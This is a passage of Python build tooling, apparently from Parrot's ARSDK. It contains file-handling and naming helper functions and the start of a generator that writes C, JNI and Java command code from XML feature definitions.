regex=ignoreRegexpsForDeletion) else: ARDeleteIfExists(DstRootDir) ar_copytree(SrcRootDir, DstRootDir, symlinks=True) else: if not os.path.exists(DstRootDir): os.makedirs(DstRootDir) for SrcDir, directories, files in os.walk(SrcRootDir): DstDir = SrcDir.replace(SrcRootDir, DstRootDir) if not os.path.exists(DstDir): os.mkdir(DstDir) for _file in files: SrcFile = os.path.join(SrcDir, _file) DstFile = os.path.join(DstDir, _file) ARDeleteIfExists(DstFile) shutil.copy2(SrcFile, DstFile) # Delete one or multiple files/directories # Do not throw an error if the file/directory does not exists def ARDeleteIfExists(*args): for fileOrDir in args: if os.path.exists(fileOrDir): if os.path.isdir(fileOrDir): shutil.rmtree(fileOrDir) else: os.remove(fileOrDir) # Delete a file if it does not match any given regex def ARDeleteFileIfNonMatching(path, regex=[]): if os.path.exists(path): name = os.path.basename(path) for exp in regex: if re.match(exp, name): break else: ARDeleteIfExists(path) # Delete a directory contents except for files matching any given regex in a list # Also deletes empty directories def ARDeleteRecursivelyNonMatching(path, regex=[]): if not os.path.isdir(path): ARDeleteFileIfNonMatching(path, regex=regex) else: for tst in os.listdir(path): ARDeleteRecursivelyNonMatching(os.path.join(path, tst), regex=regex) try: os.rmdir(path) except OSError as e: if e.errno != errno.ENOTEMPTY: raise e # Gets the number of available CPUs # If the real number can not be determined, return 1 def ARGetNumberOfCpus(): try: import multiprocessing return multiprocessing.cpu_count() except (ImportError, NotImplementedError): pass return 1 def ARReplaceEnvVars(source): envMatches = re.findall(r'%\{.*?\}%', source) for _match in envMatches: Match = _match.replace('%{', '').replace('}%', '') try: EnvMatch = os.environ[Match] source = source.replace(_match, EnvMatch) except (KeyError): ARLog('Environment variable %(Match)s is not set !' % locals()) return None return source def ARReplaceFileIfDifferent(oldFile, newFile): if not os.path.exists(oldFile) or not filecmp.cmp(oldFile, newFile): ARDeleteIfExists(oldFile) os.rename(newFile, oldFile) else: ARDeleteIfExists(newFile) def ARCapitalize (arstr): nameParts = arstr.split('_') name = '' for part in nameParts: if len(part) > 1: name = name + part[0].upper() + part[1:] elif len(part) == 1: name = name + part[0].upper() return name def ARUncapitalize (arstr): if len(arstr) > 1: return arstr[0].lower() + arstr[1:] elif len(arstr) == 1: return arstr[0].lower() else: return '' def ARStringIsInteger(arstr): try: int(arstr) return True except ValueError: return False # # Name generation functions # def ARMacroName (Module, Submodule, Name): # MODULE_SUBMODULE_NAME return Module.upper () + '_' + Submodule.upper () + '_' + Name.upper () def ARFunctionName (Module, Submodule, Name): # MODULE_Submodule_Name return Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name) def ARTypeName (Module, Submodule, Name): # MODULE_Submodule[_Name]_t if '' != Name: return Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name) + '_t' else: return Module.upper () + '_' + ARCapitalize (Submodule) + '_t' def ARGlobalName (Module, Submodule, Name): # MODULE_Submodule_Name return Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name) def ARGlobalConstName (Module, Submodule, Name): # cMODULE_Submodule_Name return 'c' + Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name) def AREnumValue (Module, Submodule, Enum, Name): # MODULE_SUBMODULE_ENUM_NAME if Enum.upper () == 'ERROR' and (Name.upper () == 'OK' or Name.upper () == 'ERROR'): return Module.upper () + '_' + Submodule.upper () + '_' + Name.upper () else: return Module.upper () + '_' + Submodule.upper () + '_' + Enum.upper () + '_' + Name.upper () def AREnumName (Module, Submodule, Enum): # eMODULE_SUBMODULE_ENUM return 'e' + Module.upper () + '_' + Submodule.upper () + '_' + Enum.upper () def ARFlagValue (Module, Submodule, Enum, Name): return Module.upper () + '_FLAG_' + Submodule.upper () + '_' + Enum.upper () + '_' + Name.upper () def ARJavaEnumType (Module, Submodule, Enum): # MODULE_SUBMODULE_ENUM_"ENUM" return Module.upper () + '_' + Submodule.upper () + '_' + Enum.upper () + '_ENUM' def ARJavaMultiSetType (Module, Submodule, multiset): # ModuleSubmoduleName return Module+ ARCapitalize (Submodule) + ARCapitalize (multiset) def ARJavaEnumValDef (Module, Submodule, Enum, Name, oldFormat=False): # MODULE_SUBMODULE_ENUM_NAME if oldFormat: return AREnumValue (Module, Submodule, Enum, Name) elif Name[0].isdigit(): return Enum.upper() + '_' + Name.upper () else: return Name.upper () def ARJavaEnumValue (Module, Submodule, Enum, Name, oldFormat=False): # MODULE_SUBMODULE_ENUM_"ENUM".MODULE_SUBMODULE_ENUM_NAME return ARJavaEnumType (Module, Submodule, Enum) + '.' + ARJavaEnumValDef (Module, Submodule, Enum, Name, oldFormat) ``` #### File: libARCommands/Tools/libARCommandsgen.py ```python import sys import os import re import arsdkparser MYDIR=os.path.abspath(os.path.dirname(__file__)) LIBARCOMMANDS_DIR=os.path.realpath(os.path.join(MYDIR, "..")) PACKAGES_DIR=os.path.realpath(os.path.join(MYDIR, "../..")) sys.path.append('%(MYDIR)s/../../ARSDKBuildUtils/Utils/Python' % locals()) from ARFuncs import * from arsdkparser import * LIB_NAME = 'libARCommands' LIB_MODULE = LIB_NAME.replace ('lib', '') ################################# # CONFIGURATION : # ################################# # Setup XML and C/HFiles Names # # Public header names must be # # LIB_NAME + '/fileName.h' # ################################# SDK_PACKAGE_ROOT='com.parrot.arsdk.' JNI_PACKAGE_NAME=SDK_PACKAGE_ROOT + LIB_MODULE.lower () JNI_PACKAGE_DIR = JNI_PACKAGE_NAME.replace ('.', '/') # Default project name DEFAULTPROJECTNAME='common' #Name of the output public header containing id enums COMMANDSID_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Ids.h' #Name of the output public header containing typedefs COMMANDSTYPES_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Types.h' #Name of the output public header containing encoder helpers COMMANDSGEN_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Generator.h' #Name of the output public header containing decoder helpers COMMANDSDEC_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Decoder.h' #Name of the output public header containing filter helpers COMMANDSFIL_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Filter.h' #Name of the output internal header containing reader/writer functions prototypes COMMANDSRW_HFILE_NAME='ARCOMMANDS_ReadWrite.h' #Name of the output C file containing reader/writer functions COMMANDSRW_CFILE_NAME='ARCOMMANDS_ReadWrite.c' #Name of the output C file containing encoder helpers COMMANDSGEN_CFILE_NAME='ARCOMMANDS_Generator.c' #Name of the output C file containing decoder helpers COMMANDSDEC_CFILE_NAME='ARCOMMANDS_Decoder.c' #Name of the output C file containing filter helpers COMMANDSFIL_CFILE_NAME='ARCOMMANDS_Filter.c' #Name of the output C/H common testbench file TB_CFILE_NAME='autoTest.c' TB_HFILE_NAME='autoTest.h' #Tag for tb ARSAL_PRINT calls TB_TAG='AutoTest' #Name of the linux entry point file for autotest TB_LIN_CFILE_NAME='autoTest_linux.c' #Name of the JNI C File JNI_CFILE_NAME='ARCOMMANDS_JNI.c' JNI_DECODER_CFILE_NAME='ARCOMMANDS_JNIDecoder.c' JNI_FILTER_CFILE_NAME='ARCOMMANDS_JNIFilter.c' #Name of the JNI JAVA File JNI_JFILE_NAME='ARCommand.java' JNI_DECODER_JFILE_NAME='ARCommandsDecoder.java' JNIClassName, _ = os.path.splitext (JNI_JFILE_NAME) JNIDecoderClassName, _ = os.path.splitext (JNI_DECODER_JFILE_NAME) JNI_FILTER_JFILE_NAME='ARCommandsFilter.java' JNIFilterClassName, _ = os.path.splitext (JNI_FILTER_JFILE_NAME) #Name of the JNI JAVA Interfaces files (DO NOT MODIFY) JAVA_INTERFACES_FILES_NAME=JNIClassName + '*Listener.java' JAVA_ENUM_FILES_NAME=JNIClassName.upper() + '*_ENUM.java' def _get_args_without_multiset(args): for arg in args: if not isinstance(arg.argType, arsdkparser.ArMultiSetting): yield arg def _get_args_multiset(args): for arg in args: if isinstance(arg.argType, arsdkparser.ArMultiSetting): yield arg class Paths: def __init__(self, outdir): #Relative path of SOURCE dir self.SRC_DIR=outdir+'/Sources/' #Relative path of INCLUDES dir self.INC_DIR=outdir+'/Includes/' #Relative path of TESTBENCH dir self.TB__DIR=outdir+'/TestBench/' #Relative path of unix-like (Linux / os-x) TESTBENCH dir self.LIN_TB_DIR=self.TB__DIR + 'linux/' #Relative path of multiplatform code for testbenches self.COM_TB_DIR=self.TB__DIR + 'common/' #Relative path of JNI dir self.JNI_DIR=outdir+'/JNI/' #Relative path of JNI/C dir self.JNIC_DIR=self.JNI_DIR + 'c/' #Relative path of JNI/Java dir self.JNIJ_DIR=self.JNI_DIR + 'java/' self.JNIJ_OUT_DIR=self.JNIJ_DIR + JNI_PACKAGE_DIR + '/' # Create array of generated files (so we can cleanup only our files) self.GENERATED_FILES = [] self.COMMANDSID_HFILE=self.INC_DIR + COMMANDSID_HFILE_NAME self.GENERATED_FILES.append (self.COMMANDSID_HFILE) self.COMMANDSGEN_HFILE=self.INC_DIR + COMMANDSGEN_HFILE_NAME self.GENERATED_FILES.append (self.COMMANDSGEN_HFILE) self.COMMANDSTYPES_HFILE=self.INC_DIR + COMMANDSTYPES_HFILE_NAME self.GENERATED_FILES.append (self.COMMANDSTYPES_HFILE) self.COMMANDSGEN_CFILE=self.SRC_DIR + COMMANDSGEN_CFILE_NAME self.GENERATED_FILES.append (self.COMMANDSGEN_CFILE) self.COMMANDSDEC_HFILE=self.INC_DIR + COMMANDSDEC_HFILE_NAME self.GENERATED_FILES.append (self.COMMANDSDEC_HFILE) self.COMMANDSDEC_CFILE=self.SRC_DIR + COMMANDSDEC_CFILE_NAME self.GENERATED_FILES.append (self.COMMANDSDEC_CFILE) self.COMMANDSFIL_HFILE=self.INC_DIR + COMMANDSFIL_HFILE_NAME self.GENERATED_FILES.append (self.COMMANDSFIL_HFILE) self.COMMANDSFIL_CFILE=self.SRC_DIR + COMMANDSFIL_CFILE_NAME self.GENERATED_FILES.append (self.COMMANDSFIL_CFILE) self.COMMANDSRW_HFILE=self.SRC_DIR + COMMANDSRW_HFILE_NAME self.GENERATED_FILES.append (self.COMMANDSRW_HFILE) self.COMMANDSRW_CFILE=self.SRC_DIR + COMMANDSRW_CFILE_NAME self.GENERATED_FILES.append (self.COMMANDSRW_CFILE) self.TB_CFILE=self.COM_TB_DIR + TB_CFILE_NAME self.GENERATED_FILES.append (self.TB_CFILE) self.TB_HFILE=self.COM_TB_DIR + TB_HFILE_NAME self.GENERATED_FILES.append (self.TB_HFILE) self.TB_LIN_CFILE=self.LIN_TB_DIR + TB_LIN_CFILE_NAME self.GENERATED_FILES.append (self.TB_LIN_CFILE) # Create array of generated JNI files (so we can cleanup only our files) self.GENERATED_JNI_FILES = [] self.JNI_CFILE=self.JNIC_DIR + JNI_CFILE_NAME self.GENERATED_JNI_FILES.append (self.JNI_CFILE) self.JNI_DECODER_CFILE=self.JNIC_DIR + JNI_DECODER_CFILE_NAME self.GENERATED_JNI_FILES.append (self.JNI_DECODER_CFILE) self.JNI_FILTER_CFILE=self.JNIC_DIR + JNI_FILTER_CFILE_NAME self.GENERATED_JNI_FILES.append (self.JNI_FILTER_CFILE) # Create array of generated JAVA files (so we can cleanup only our files) self.GENERATED_JAVA_FILES = [] self.JNI_JFILE=self.JNIJ_OUT_DIR + JNI_JFILE_NAME self.GENERATED_JAVA_FILES.append (self.JNI_JFILE) self.JNI_DECODER_JFILE=self.JNIJ_OUT_DIR + JNI_DECODER_JFILE_NAME self.GENERATED_JAVA_FILES.append (self.JNI_DECODER_JFILE) self.JNI_FILTER_JFILE=self.JNIJ_OUT_DIR + JNI_FILTER_JFILE_NAME self.GENERATED_JAVA_FILES.append (self.JNI_FILTER_JFILE) self.JAVA_INTERFACES_FILES=self.JNIJ_OUT_DIR + JAVA_INTERFACES_FILES_NAME self.JAVA_ENUM_FILES=self.JNIJ_OUT_DIR + JAVA_ENUM_FILES_NAME ##### END OF CONFIG ##### # Create names for #ifndef _XXX_ statements in .h files COMMANDSID_DEFINE='_' + COMMANDSID_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_' COMMANDSDEC_DEFINE='_' + COMMANDSDEC_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_' COMMANDSGEN_DEFINE='_' + COMMANDSGEN_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_' COMMANDSTYPES_DEFINE='_' + COMMANDSTYPES_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_' COMMANDSRW_DEFINE='_' + COMMANDSRW_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_' COMMANDSFIL_DEFINE='_' + COMMANDSFIL_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_' TB_DEFINE='_' + TB_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_' # Submodules names ID_SUBMODULE='ID' GEN_SUBMODULE='Generator' DEC_SUBMODULE='Decoder' FIL_SUBMODULE='Filter' RW_SUBMODULE='ReadWrite' TB_SUBMODULE='Testbench' JNI_SUBMODULE='JNI' JNI_FILTER_SUBMODULE='JNI_FILTER' hasArgOfType = {ArArgType.U8 : True, ArArgType.I8 : False, ArArgType.U16 : True, ArArgType.I16 : False, ArArgType.U32 : False, ArArgType.I32 : False, ArArgType.U64 : False, ArArgType.I64 : False, ArArgType.FLOAT : False, ArArgType.DOUBLE : False, ArArgType.STRING : False, ArArgType.ENUM : False, ArArgType.BITFIELD : False, ArArgType.MULTISETTING : False} #Type conversion from XML Defined types to many other types # XML Defined types XMLTYPES = [ArArgType.U8, ArArgType.I8, ArArgType.U16, ArArgType.I16, ArArgType.U32, ArArgType.I32, ArArgType.U64, ArArgType.I64, ArArgType.FLOAT, ArArgType.DOUBLE, ArArgType.STRING] # Equivalent C types CTYPES = ['uint8_t', 'int8_t', 'uint16_t', 'int16_t', 'uint32_t', 'int32_t', 'uint64_t', 'int64_t', 'float', 'double', 'char *'] # Equivalent C types with const char * CTYPES_WC = ['uint8_t', 'int8_t', 'uint16_t', 'int16_t', 'uint32_t', 'int32_t', 'uint64_t', 'int64_t', 'float', 'double', 'const char *'] # Equivalent size for the Generator internal functions SZETYPES = ['U8', 'U8', 'U16', 'U16', 'U32', 'U32', 'U64', 'U64', 'Float', 'Double', 'String'] # Equivalent calls for the Decoder internal functions CREADERS = [ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer'), ' (int8_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer'), ' (int16_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer'), ' (int32_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer'), ' (int64_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadFloatFromBuffer'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadDoubleFromBuffer'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadStringFromBuffer')] # Equivalent calls for the Decoder print internal functions CPRINTERS = [ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU8'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI8'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU16'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI16'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU32'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU64'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI64'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintFloat'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintDouble'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintString')] # Equivalent JAVA Types # No unsigned types in java, so use signed types everywhere JAVATYPES = ['byte', 'byte', 'short', 'short', 'int', 'int', 'long', 'long', 'float', 'double', 'String'] # Equivalent JNI Signatures JAVASIG = ['B', 'B', 'S', 'S', 'I', 'I', 'J', 'J', 'F', 'D', 'Ljava/lang/String;'] # Equivalent JNI types JNITYPES = ['jbyte', 'jbyte', 'jshort', 'jshort', 'jint', 'jint', 'jlong', 'jlong', 'jfloat', 'jdouble', 'jstring'] # JNI UnsignedToSigned casts JNIUTSCASTS = ['(jbyte)', '', '(jshort)', '', '(jint)', '', '(jlong)', '', '', '', ''] def xmlToC (module, ftr, cmd, arg, is_arg=False): if isinstance(arg.argType, ArEnum): return AREnumName (module, get_ftr_old_name(ftr), arg.argType.name) if isinstance(arg.argType, ArMultiSetting): ctype = ARTypeName (module, get_ftr_old_name(ftr), arg.argType.name) if (is_arg): return ctype + ' *' return ctype if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return CTYPES [xmlIndex] def xmlToCcharAreConst (module, ftr, cmd, arg, is_arg=False): if isinstance(arg.argType, ArEnum): return AREnumName (module, get_ftr_old_name(ftr), arg.argType.name) if isinstance(arg.argType, ArMultiSetting): ctype = ARTypeName (module, get_ftr_old_name(ftr), arg.argType.name) if (is_arg): return ctype + ' *' return ctype if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return CTYPES_WC [xmlIndex] def xmlToCwithConst (module, ftr, cmd, arg, is_arg=False): if isinstance(arg.argType, ArEnum): return AREnumName (module, get_ftr_old_name(ftr), arg.argType.name) if isinstance(arg.argType, ArMultiSetting): ctype = 'const ' + ARTypeName (module, get_ftr_old_name(ftr), arg.argType.name) if is_arg: return ctype + ' *' return ctype if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return CTYPES_WC [xmlIndex] def xmlToSize (ftr, cmd, arg): if isinstance(arg.argType, ArEnum): return 'U32'; if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return SZETYPES [xmlIndex] def xmlToReader (ftr, cmd, arg): if isinstance(arg.argType, ArEnum): return '(' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) + ')' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer') if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return CREADERS [xmlIndex] def xmlToPrinter (ftr, cmd, arg): if isinstance(arg.argType, ArEnum): return '(' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) + ')' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32') if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return CPRINTERS [xmlIndex] def xmlToJava (module, ftr, cmd, arg): if isinstance(arg.argType, ArEnum): return ARJavaEnumType (module, get_ftr_old_name(ftr), arg.argType.name) if isinstance(arg.argType, ArMultiSetting): return ARJavaMultiSetType (module, get_ftr_old_name(ftr), arg.argType.name) if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return JAVATYPES [xmlIndex] def jniEnumClassName (ftr, cmd, arg): if not isinstance(arg.argType, ArEnum): return '' return JNI_PACKAGE_DIR + '/' + ARJavaEnumType (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) def jniClassName (ftr, cmd, arg): return JNI_PACKAGE_DIR + '/' + ARJavaMultiSetType (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) def xmlToJavaSig (ftr, cmd, arg): if isinstance(arg.argType, ArEnum): return 'L' + jniEnumClassName (ftr, cmd, arg) + ';' if isinstance(arg.argType, ArMultiSetting): return 'L' + jniClassName (ftr, cmd, arg) + ';' if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return JAVASIG [xmlIndex] def xmlToJni (ftr, cmd, arg): if isinstance(arg.argType, ArEnum): return 'jint' if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return JNITYPES [xmlIndex] def xmlToJniCast (ftr, cmd, arg): if isinstance(arg.argType, ArEnum): return '(jint)' if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return JNIUTSCASTS [xmlIndex] def format_cmd_name(msg, underscore=False):#projetc only if underscore: return ARCapitalize(msg.name) if msg.cls is None else ARCapitalize(msg.cls.name) + '_'+ ARCapitalize(msg.name) else: return msg.name if msg.cls is None else msg.cls.name + ARCapitalize(msg.name) def get_arg_doc(arg): doc = '' if arg.argType in ArArgType.TO_STRING: doc = arg.doc else: if arg.doc: doc = arg.doc + '\n' if isinstance(arg.argType, ArEnum): doc = doc + arg.argType.doc elif isinstance(arg.argType, ArBitfield): doc = doc + arg.argType.enum.doc elif isinstance(arg.argType, ArMultiSetting): doc = doc + arg.argType.doc return doc def get_ftr_old_name(ftr): FROM_NEW_NAME = { 'ardrone3':'ARDrone3', 'common_dbg':'commonDebug', 'jpsumo':'JumpingSumo', 'minidrone':'MiniDrone', 'skyctrl':'SkyController'} if ftr.name in FROM_NEW_NAME: return FROM_NEW_NAME[ftr.name] else: return ftr.name # Sample args for testbench SAMPLEARGS = ['42', '-42', '4200', '-4200', '420000', '-420000', '420102030405ULL', '-420102030405LL', '42.125', '-42.000001', '"Test string with spaces"'] # Formatter for printf PRINTFF = ['%u', '%d', '%u', '%d', '%u', '%d', '%llu', '%lld', '%f', '%f', '%s'] def xmlToSample (ftr, cmd, arg): if isinstance(arg.argType, ArEnum): return '(' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) + ')0'; if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return SAMPLEARGS [xmlIndex] def xmlToPrintf (ftr, cmd, arg): if isinstance(arg.argType, ArEnum): return '%d'; if isinstance(arg.argType, ArBitfield): xmlIndex = XMLTYPES.index (arg.argType.btfType) else: xmlIndex = XMLTYPES.index (arg.argType) return PRINTFF [xmlIndex] LICENCE_HEADER='''/* Copyright (C) 2014 Parrot SA Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Parrot nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ ''' DEC_ERR_ENAME='ERROR' GEN_ERR_ENAME='ERROR' FIL_STATUS_ENAME='STATUS' FIL_ERROR_ENAME='ERROR' def interfaceName (ftr, cmd): return JNIClassName + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener' def interfaceVar (ftr, cmd): return '_' + interfaceName (ftr, cmd) def javaCbName (ftr, cmd): return 'on' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Update' def native_generateCmds(ctx, paths): genDebug = True genTreeFilename = None projects = [DEFAULTPROJECTNAME] if not os.path.exists (paths.SRC_DIR): os.makedirs (paths.SRC_DIR) if not os.path.exists (paths.INC_DIR): os.makedirs (paths.INC_DIR) if not os.path.exists (paths.INC_DIR + LIB_NAME): os.makedirs (paths.INC_DIR + LIB_NAME) ################################# # 1ST PART : # ################################# # Read XML file to local arrays # # of commands / classes # ################################# allFeatures = ctx.features # Check types used for ftr in allFeatures: for msg in ftr.getMsgs(): for arg in msg.args: if isinstance(arg.argType, ArEnum): hasArgOfType[ArArgType.ENUM] = True elif isinstance(arg.argType, ArBitfield): hasArgOfType[ArArgType.BITFIELD] = True hasArgOfType[arg.argType.btfType] = True elif isinstance(arg.argType, ArMultiSetting): hasArgOfType[ArArgType.MULTISETTING] = True else: hasArgOfType[arg.argType] = True ################################# # 2ND PART : # ################################# # Write private H files # ################################# hfile = open (paths.COMMANDSID_HFILE, 'w') hfile.write (LICENCE_HEADER) hfile.write ('/********************************************\n') hfile.write (' * AUTOGENERATED FILE *\n') hfile.write (' * DO NOT MODIFY IT *\n') hfile.write (' * *\n') hfile.write (' * To add new commands : *\n') hfile.write (' * - Modify ../Xml/commands.xml file *\n') hfile.write (' * - Re-run generateCommandsList.py script *\n') hfile.write (' * *\n') hfile.write (' ********************************************/\n') hfile.write ('\n') hfile.write ('#ifndef ' + COMMANDSID_DEFINE + '\n') hfile.write ('#define ' + COMMANDSID_DEFINE + ' (1)\n') hfile.write ('\n') hfile.write ('// ARSDK_NO_ENUM_PREPROCESS //\n') hfile.write ('typedef enum {\n') for ftr in allFeatures: ENAME='FEATURE' hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, get_ftr_old_name(ftr)) + ' = ' + str(ftr.featureId) + ',\n') hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('#define ' + ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') + ' (0) //default class id use by features.\n') hfile.write ('\n') hfile.write ('\n') #project only for ftr in allFeatures: if ftr.classes: ENAME=get_ftr_old_name(ftr) + '_CLASS' hfile.write ('typedef enum {\n') for cl in ftr.classes: hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, cl.name) + ' = ' + str(cl.classId) + ',\n') hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n') hfile.write ('\n') hfile.write ('\n') for ftr in allFeatures: if ftr.classes: #project only for cl in ftr.classes: hfile.write ('typedef enum {\n') ENAME=get_ftr_old_name(ftr) + '_' + cl.name + '_CMD' first = True for cmd in cl.cmds: hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, cmd.name) + ' = ' + str(cmd.cmdId) + ',\n') hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n') hfile.write ('\n') else: hfile.write ('typedef enum {\n') ENAME=get_ftr_old_name(ftr) + '_CMD' first = True for cmd in ftr.cmds + ftr.evts: hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, cmd.name) + ' = ' + str(cmd.cmdId) + ',\n') hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('#endif /* ' + COMMANDSID_DEFINE + ' */\n') hfile.close () hfile = open(paths.COMMANDSRW_HFILE, 'w') hfile.write ('/********************************************\n') hfile.write (' * AUTOGENERATED FILE *\n') hfile.write (' * DO NOT MODIFY IT *\n') hfile.write (' * *\n') hfile.write (' * To add new commands : *\n') hfile.write (' * - Modify ../Xml/commands.xml file *\n') hfile.write (' * - Re-run generateCommandsList.py script *\n') hfile.write (' * *\n') hfile.write (' ********************************************/\n') hfile.write ('\n') hfile.write ('#ifndef ' + COMMANDSRW_DEFINE + '\n') hfile.write ('#define ' + COMMANDSRW_DEFINE + ' (1)\n') hfile.write ('\n') hfile.write ('#include <inttypes.h>\n') hfile.write ('#include <string.h>\n') hfile.write ('#include <stdlib.h>\n') hfile.write ('\n') hfile.write ('// ------- //\n') hfile.write ('// WRITERS //\n') hfile.write ('// ------- //\n') hfile.write ('\n') if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]: hfile.write ('// Add an 8 bit value to the buffer\n') hfile.write ('// Returns -1 if the buffer is not big enough\n') hfile.write ('// Returns the new offset in the buffer on success\n') hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (uint8_t *buffer, uint8_t newVal, int32_t oldOffset, int32_t buffCap);\n') hfile.write ('\n') if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]: hfile.write ('// Add a 16 bit value to the buffer\n') hfile.write ('// 